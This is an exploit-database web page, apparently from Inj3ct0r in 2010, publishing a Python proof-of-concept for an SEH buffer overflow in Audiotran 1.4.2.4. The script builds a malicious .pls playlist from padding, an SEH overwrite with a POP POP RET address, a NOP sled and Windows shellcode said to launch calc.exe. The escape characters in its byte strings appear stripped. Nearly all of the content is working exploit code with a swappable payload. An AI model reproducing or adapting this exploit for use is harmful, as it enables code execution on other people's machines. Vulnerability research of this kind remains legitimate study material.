Home / os / win7

[local exploits] - Audiotran 1.4.2.4 SEH Overflow Exploit

Posted on 08 September 2010

<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Strict//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd'><html xmlns='http://www.w3.org/1999/xhtml'><head><meta http-equiv='Content-Type' content='text/html; charset=utf-8' /><meta http-equiv='Content-Language' content='en' /><title>Audiotran 1.4.2.4 SEH Overflow Exploit | Inj3ct0r - exploit database : vulnerability : 0day : shellcode</title><meta name='description' content='Exploit category: local exploits | Exploit author: Abhishek Lyall' /><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon' /><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss' /><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></head><body><pre>======================================
Audiotran 1.4.2.4 SEH Overflow Exploit 
======================================

#Audiotran 1.4.2.4 SEH Overflow Exploit 0 day
#Author Abhishek Lyall - abhilyall[at]gmail[dot]com, info[at]aslitsecurity[dot]com
#Web - http://www.aslitsecurity.com/
#Blog - http://www.aslitsecurity.blogspot.com/
#Download Vulnerable application from http://www.e-soft.co.uk/Audiotran.htm
#Vulnerable version Audiotran 1.4.2.4
#Tested on XP SP2
#Greets Villy, Puneet Jain, Abhishek Sahni and ASL IT SECURITY TEAM
#!/usr/bin/python
#To load the playlist file in audiotran copy the ASL.pls
#file in C:Program FilesAudiotran and click on
#load playlist and doubleclick on ASL.pls
 
filename = &quot;ASL.pls&quot;
 
#windows/exec - CMD=calc.exe
shellcode = (
b&quot;xDBxDFxD9x74x24xF4x58x2BxC9xB1x33xBA&quot;
b&quot;x4CxA8x75x76x83xC0x04x31x50x13x03x1CxBBx97x83x60&quot;
b&quot;x53xDEx6Cx98xA4x81xE5x7Dx95x93x92xF6x84x23xD0x5A&quot;
b&quot;x25xCFxB4x4ExBExBDx10x61x77x0Bx47x4Cx88xBDx47x02&quot;
b&quot;x4AxDFx3Bx58x9Fx3Fx05x93xD2x3Ex42xC9x1Dx12x1Bx86&quot;
b&quot;x8Cx83x28xDAx0CxA5xFEx51x2CxDDx7BxA5xD9x57x85xF5&quot;
b&quot;x72xE3xCDxEDxF9xABxEDx0Cx2DxA8xD2x47x5Ax1BxA0x56&quot;
b&quot;x8Ax55x49x69xF2x3Ax74x46xFFx43xB0x60xE0x31xCAx93&quot;
b&quot;x9Dx41x09xEEx79xC7x8Cx48x09x7Fx75x69xDExE6xFEx65&quot;
b&quot;xABx6Dx58x69x2AxA1xD2x95xA7x44x35x1CxF3x62x91x45&quot;
b&quot;xA7x0Bx80x23x06x33xD2x8BxF7x91x98x39xE3xA0xC2x57&quot;
b&quot;xF2x21x79x1ExF4x39x82x30x9Dx08x09xDFxDAx94xD8xA4&quot;
b&quot;x05x77xC9xD0xADx2Ex98x59xB0xD0x76x9DxCDx52x73x5D&quot;
b&quot;x2Ax4AxF6x58x76xCCxEAx10xE7xB9x0Cx87x08xE8x6Ex46&quot;
b&quot;x9Bx70x5FxEDx1Bx12x9F&quot;
)
 
head = &quot;x5Bx70x6Cx61x79x6Cx69x73x74x5Dx0Dx0Ax46x69x6Cx65x31x3D&quot;
 
junk = &quot;x41&quot; * 1940
nseh = &quot;xebx06x90x90&quot;  # Short Jump
seh = &quot;xcbx75x52x73&quot;   # POP POP RET 0x735275CB msvbvm60.dll
nop = &quot;x90&quot; * 12          # NOP Sled
padd = &quot;x90&quot; *(5000-len(junk+nseh+seh+nop+shellcode))
 
textfile = open(filename , &#039;w&#039;)
textfile.write(head+junk+nseh+seh+nop+shellcode+padd)
textfile.close()


# <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-09-08]</pre></body></html>

 

TOP

Malware :

Exploits :